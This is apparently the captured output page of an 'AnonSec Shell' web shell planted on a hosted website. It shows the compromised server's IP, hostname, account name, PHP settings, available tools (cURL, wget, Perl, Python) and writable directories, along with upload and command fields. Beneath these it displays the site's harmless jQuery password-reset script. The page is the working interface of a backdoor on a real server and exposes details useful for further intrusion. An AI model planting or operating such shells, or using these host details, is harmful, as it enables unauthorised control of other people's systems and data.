AnonSec Shell
Server IP : 149.202.105.228  /  Your IP : 216.73.216.18
Web Server : Apache
System : Linux webm129.cluster030.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : atfycaf ( 116275)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/atfycaf/www/js/jsF/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/atfycaf/www/js/jsF/password-reset.js
$(document).ready(function() {
	$("#nPass").pStrength({
		"changeBackground": false,
		"onPasswordStrengthChanged": function(passwordStrength, strengthPercentage) {
			if ($(this).val()) {
				$.fn.pStrength('changeBackground', $(this).parent(".formInput"), passwordStrength);
			} else {
				$.fn.pStrength('resetStyle', $(this));
			}
			$("#passwordReset").removeClass("pCheck27");
			$("#" + $(this).data('display')).slideDown("slow");
			$("#" + $(this).data('display')).html('Your password strength is <span id="pStrength">' + strengthPercentage + '</span>%');
		},
		"onValidatePassword": function(strengthPercentage) {
			$("#" + $(this).data('display')).html(
				$("#" + $(this).data("display")).html() + ". Great, now you can change your password"
			);

			$("#passwordReset").addClass("pCheck27");
		}
	});
	$(document).on("change", "#nPass, #nPassR", function() {
		checkMatch();
	});
	$(document).on("focusout", "#nPass, #nPassR", function() {
		checkMatch();
	});
	$(document).on("keyup", "#nPass, #nPassR", function() {
		checkMatch();
	});
	function checkMatch() {
		var inpPassR = $("#nPassR").val();
		var inpPass = $("#nPass").val();
		if (inpPassR == inpPass) {
			$("#passNoMatch").slideUp("slow");
			var pStrength = parseInt($("#pStrength").html());
			if (pStrength > 60) {
				$("#saveChanges").prop("disabled", false);
			} else {
				$("#saveChanges").prop("disabled", true);
			}
		} else {
			$("#passNoMatch").slideDown("slow");
			$("#saveChanges").prop("disabled", true);
		}
	}
	$("#passwordReset").submit(function() {
		if ($(this).hasClass("pCheck27")) {
			return true;
		} else {
			return false;
		}
	});
});

Anon7 - 2022
AnonSec Team